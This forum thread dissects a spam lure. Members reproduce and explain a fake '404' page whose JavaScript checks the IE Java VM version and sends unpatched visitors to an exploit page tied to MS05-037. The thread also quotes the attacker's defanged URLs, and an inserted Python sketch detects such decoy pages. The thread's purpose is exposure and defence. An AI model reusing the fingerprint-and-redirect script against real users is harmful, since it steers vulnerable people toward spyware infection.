Always getting a 404 error :(


Nikkytas

A friend of mine told me about some statistical information available at this page:

http:/www.abetterstart.com/c/2000/counter21.php

However, every time I hit it, it says 404 error, while my friend is getting the content page.

I don't think I'm doing anything wrong, but damn... I just can't figure out what can be done to get this page visible :((((

Link to comment
Share on other sites

A friend of mine told me about some statistical information available at this page:

http:/www.abetterstart.com/c/2000/counter21.php

However, every time I hit it, it says 404 error, while my friend is getting the content page.

I don't think I'm doing anything wrong, but damn... I just can't figure out what can be done to get this page visible :((((

I have taken one of the "/" out of your post until I can determine if this is spam, something else, or completely legit.

Link to comment
Share on other sites

It's definitely spam; that isn't the server's genuine 404 error.

Set your user agent to IE and it returns (what appears to be) a JavaScript exploit for IE. The code is shown below (but not all the code; there is more if you follow the JavaScript URLs, and you will eventually end up at this page: http:/www.abetterstart.com/c/2000/counter21.php?j=1, which could be an exploit payload):

<HTML>
<HEAD>
<TITLE>404 error - Document Not Found</TITLE>
</HEAD>
<STYLE>
BODY {
  BEHAVIOR: url(#default#clientCaps)
}
</STYLE>
<BODY id=testing>
<script language='javascript'>
var i,l,v;
num = 3;
s = '{08B0E5C0-4FCB-11CF-AAA5-00401C608500}';
l = testing.isComponentInstalled(s,'ComponentID');
v = testing.getComponentVersion(s,'ComponentID');
if (l == true) {
  x = v.split(',');
  if ( (x[0]!=0) && (x[2]<3810) ) {
    num = 1;
  }
}
c = 'http://www.abetterstart.com/c/2000/'+'counter21.php'+'?b='+num;
window.location = c;
</script>
</BODY>
</HTML>

Well... this is either spam or the guy asking was smart enough to use Firefox and not get his box owned :lol:

Link to comment
Share on other sites

That isn't exploit code, it's just checking if Java is installed, a specific version and allowed. Then it hops you to the next site that infects your computer with spyware. Just ran it through a sandbox.

I took your URL out as well. I don't want people clicking on it on accident.

It's Vako's call if he wants it gone.

Link to comment
Share on other sites

Code explained:

Initialize Javascript and declare variables: (no big deal)

<script language='javascript'>

var i,l,v;

num = 3;

This is the registry entry for Internet Explorer for the Java component. Run regedit and do a search just for the alphanumerics in the brackets:

s = '{08B0E5C0-4FCB-11CF-AAA5-00401C608500}';

You should find it at: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\ClsidFeature

Uses a Boolean test to verify that the Java component exists:

l = testing.isComponentInstalled(s,'ComponentID');

Saves the whole value of the registry key to the value 'v':

v = testing.getComponentVersion(s,'ComponentID');

Mine looked like this -> {08B0E5C0-4FCB-11CF-AAA5-00401C608500}!5,0,3200,0

This is where it starts checking for what it wants:

Is the component installed? If yes, continue:

if (l == true) {

Split up the 'v' variable using the delimiter ",":

x = v.split(',');

If there is a version and it is less than 3810 then change "num" to 1;

if ( (x[0]!=0) && (x[2]<3810) ) {

num = 1;

Send the user to a specific site based on the results and value of "num"

 c = 'http://www.abetterstart.com/c/2000/'+'counter21.php'+'?b='+num;

window.location = c;

So, people who are "vulnerable" would go to: http:/www.abetterstart.com/v/200/counter21.php?b=1

And those who aren't go to: http:/www.abetterstart.com/v/200/counter21.php?b=3

again, with the "/" taken out.

Link to comment
Share on other sites
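A defender-side sketch of the page walked through in the two posts above, added here as an example and not code posted by anyone in the thread: it flags a captured response body that combines the clientCaps behavior, a component probe and a script redirect, and it reproduces the quoted version check so that version strings collected from hosts can be sorted the way the script sorts them. The names `triage`, `build_is_flagged` and `INDICATORS` and the host `example.invalid` are assumptions made for the example.

```python
import re

# Constructed sample: the decoy page quoted in this thread, condensed, with the
# redirect host replaced by the reserved name example.invalid.
SAMPLE = """<HTML><HEAD><TITLE>404 error - Document Not Found</TITLE></HEAD>
<STYLE>BODY { BEHAVIOR: url(#default#clientCaps) }</STYLE>
<BODY id=testing><script language='javascript'>
num = 3; s = '{08B0E5C0-4FCB-11CF-AAA5-00401C608500}';
l = testing.isComponentInstalled(s,'ComponentID');
v = testing.getComponentVersion(s,'ComponentID');
if (l == true) { x = v.split(','); if ((x[0]!=0) && (x[2]<3810)) { num = 1; } }
window.location = 'http://example.invalid/counter.php?b=' + num;
</script></BODY></HTML>"""

CLSID = re.compile(r"\{[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\}", re.I)
INDICATORS = {
    "error_title": re.compile(r"<title>[^<]*\b404\b[^<]*</title>", re.I),
    "clientcaps_behavior": re.compile(r"url\(\s*#default#clientCaps\s*\)", re.I),
    "component_probe": re.compile(r"\.(?:isComponentInstalled|getComponentVersion)\s*\(", re.I),
    "script_redirect": re.compile(r"\b(?:window|document)\.location(?:\.href)?\s*=[^=]", re.I),
}

def triage(body):
    """Flag a response body that fingerprints IE components and then redirects."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(body)}
    return {
        # An error page has no reason to probe components and redirect by script.
        "decoy": {"clientcaps_behavior", "component_probe", "script_redirect"} <= hits,
        "indicators": sorted(hits),
        "probed_clsids": sorted({c.upper() for c in CLSID.findall(body)}),
    }

def build_is_flagged(version, threshold=3810):
    """True if a 'major,minor,build,rev' string passes the quoted check.

    Follows the script (major != 0 and build < 3810); an empty, short or
    non-numeric string is treated as not flagged, matching the script's default.
    """
    parts = [p.strip() for p in (version or "").split(",")]
    if len(parts) < 3 or not (parts[0].isdigit() and parts[2].isdigit()):
        return False
    return int(parts[0]) != 0 and int(parts[2]) < threshold
```

A plain error page matches only `error_title` and is not marked as a decoy; the version string quoted in the post above, `5,0,3200,0`, is flagged.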

It's Vako's call if he wants it gone.

Nope, this is perfect. Instead of idle threats against the spammer, you've actually gone through what it's trying to do. Net result: We all learned a little more and the spammer is exposed.

Link to comment
Share on other sites

Which version of Java did you have installed on that sandbox?

Also, how did you determine that it's in fact Java? Common knowledge, or something in the key that gave it away?

Link to comment
Share on other sites

That was the tip I needed.

They're testing to see if you're vulnerable to the problem in the JView Profiler which could allow remote code execution.

Microsoft Advisory MS05-37: http://www.microsoft.com/technet/security/...n/MS05-037.mspx

Secunia Advisory SA15891: http://secunia.com/advisories/15891/

Version 3810 specifically fixes this particular problem, which started out with this: http://www.microsoft.com/technet/security/...ory/903144.mspx

The flaw was originally discovered in July 2005, so if you didn't update your system since then... Well, in that case you kinda deserve to get hacked, really.

Link to comment
Share on other sites

Yes, but the question is not how many of "US" this attack will fail against. It's how many of our mothers and fathers and grandparents this attack will fail against. How many organizations use IE because of policy, and do not allow installation of Firefox or Opera? Statistics is a scary thing when you start thinking global.

Link to comment
Share on other sites
